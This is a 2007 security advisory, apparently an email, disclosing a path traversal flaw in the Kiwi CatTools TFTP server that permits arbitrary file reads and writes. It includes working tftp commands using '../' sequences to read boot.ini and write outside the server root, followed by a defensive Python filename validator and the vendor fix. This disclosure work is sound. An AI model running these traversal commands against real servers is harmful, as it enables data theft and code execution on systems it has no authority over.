<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns="http://www.w3.org/TR/REC-html40">
<head>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=us-ascii">
<meta name=Generator content="Microsoft Word 11 (filtered medium)">
<style>
<!--
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
        {margin:0in;
        margin-bottom:.0001pt;
        font-size:12.0pt;
        font-family:"Times New Roman";}
a:link, span.MsoHyperlink
        {color:blue;
        text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
        {color:purple;
        text-decoration:underline;}
span.EmailStyle17
        {mso-style-type:personal;
        font-family:Arial;
        color:windowtext;}
span.EmailStyle18
        {mso-style-type:personal;
        font-family:Arial;
        color:navy;}
span.EmailStyle19
        {mso-style-type:personal-reply;
        font-family:Arial;
        color:navy;}
@page Section1
        {size:8.5in 11.0in;
        margin:1.0in 1.25in 1.0in 1.25in;}
div.Section1
        {page:Section1;}
-->
</style>
</head>
<body lang=EN-US link=blue vlink=purple>
<div class=Section1>
<p class=MsoNormal style='margin-bottom:12.0pt'><font size=3
face="Times New Roman"><span style='font-size:12.0pt'>Path traversal security
vulnerability in Kiwi CatTools TFTP server up to 3.2.8 can lead to information
disclosure and remote code execution<br>
<br>
Risk: High<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'>DISCUSSION<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'><br>
The Kiwi CatTools TFTP server does not properly verify the filename in PUT and
GET requests, which can be used to download any file from, or upload any file
to, the server. The default setting allows existing files to be replaced. With
that setting it is possible to replace executable files and run code of the
attacker's choice. <br>
<br>
EXAMPLES<br>
<br>
C:\>tftp -i 10.1.1.2 GET /x/../../../../../boot.ini boot.txt<br>
<br>
Transfer successful: 212 bytes in 1 second, 212 bytes/s<br>
<br>
C:\>type boot.txt<br>
<br>
[boot loader]<br>
timeout=30<br>
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS<br>
<br>
C:\>tftp -i 10.1.1.2 PUT boot.txt /x/../../../../../pttest.txt<br>
<br>
Transfer successful: 212 bytes in 1 second, 212 bytes/s<br>
<br>
C:\>type pttest.txt<br>
<br>
[boot loader]<br>
timeout=30<br>
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS<br>
<br>
C:\><o:p></o:p></span></font></p>
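<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'>The filename verification that the requests above bypass, as an added
example (not code from the advisory or from the vendor): it parses an RFC 1350
read/write request, confines the name to a root directory and refuses to
replace existing files. TFTP_ROOT, the exists hook and sample_request are
assumptions made for the illustration.</span></font></p>
<pre>
```python
import ntpath

TFTP_ROOT = r"C:\TFTP-Root"      # assumed root directory, not from the advisory
OPCODES = {1: "GET", 2: "PUT"}   # RFC 1350 opcodes: RRQ = 1, WRQ = 2


def parse_request(packet):
    """Split an RFC 1350 RRQ/WRQ packet into (operation, filename, mode)."""
    opcode = int.from_bytes(packet[:2], "big")
    if opcode not in OPCODES:
        raise ValueError("not a read or write request")
    # Body is filename NUL mode NUL, optionally followed by RFC 2347 options.
    fields = packet[2:].split(b"\x00")
    name, mode = (fields + [b"", b""])[:2]
    if not name or not mode or fields[-1] != b"":
        raise ValueError("malformed request")
    return OPCODES[opcode], name.decode("ascii"), mode.decode("ascii").lower()


def resolve(filename, root=TFTP_ROOT):
    """Map a requested name to a path below root, or raise ValueError."""
    name = filename.replace("/", "\\")
    drive, rest = ntpath.splitdrive(name)
    if drive or ":" in rest:
        raise ValueError("drive, UNC or stream specifier in filename")
    # Windows path normalisation can drop trailing dots and spaces, so reject
    # any component made only of them (".", "..", ".. ", "...").
    if any(part and not part.strip(". ") for part in rest.split("\\")):
        raise ValueError("dot-only component in filename")
    root = ntpath.normpath(root)
    candidate = ntpath.normpath(ntpath.join(root, rest.lstrip("\\")))
    # Defence in depth: the normalised result must be strictly below the root.
    common = ntpath.commonpath([root, candidate]).lower()
    if common != root.lower() or candidate.lower() == root.lower():
        raise ValueError("path is not below the TFTP root")
    return candidate


def authorize(packet, exists, allow_overwrite=False):
    """Return (operation, path) or raise; exists(path) is a hypothetical hook."""
    operation, filename, _mode = parse_request(packet)
    path = resolve(filename)
    if operation == "PUT" and exists(path) and not allow_overwrite:
        raise ValueError("refusing to replace an existing file")
    return operation, path


def sample_request(opcode, filename, mode="octet"):
    """Build a constructed RRQ/WRQ packet for exercising the checks."""
    return opcode.to_bytes(2, "big") + filename.encode() + b"\0" + mode.encode() + b"\0"
```
</pre>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'>The check is purely lexical: it does not resolve junctions or symbolic
links that may exist below the root directory.</span></font></p>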
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'>SOLUTION<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'>Upgrade to CatTools 3.2.9, which is available for download at <a
href="http://www.kiwisyslog.com/downloads.php"
title="http://www.kiwisyslog.com/downloads.php"><span
title="http://www.kiwisyslog.com/downloads.php">http://www.kiwisyslog.com/downloads.php</span></a><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'>CREDITS<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'>Sergey Gordeychik of Positive Technologies (www.ptsecurity.com)<br>
<br>
DISCLOSURE TIMELINE<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'>Vulnerability discovered:
11/20/2006<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'>Initial vendor contact:
12/08/2006<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'>Patch released:
02/13/2007<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'>Public disclosure:
02/27/2007<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'><o:p> </o:p></span></font></p>
</div>
</body>
</html>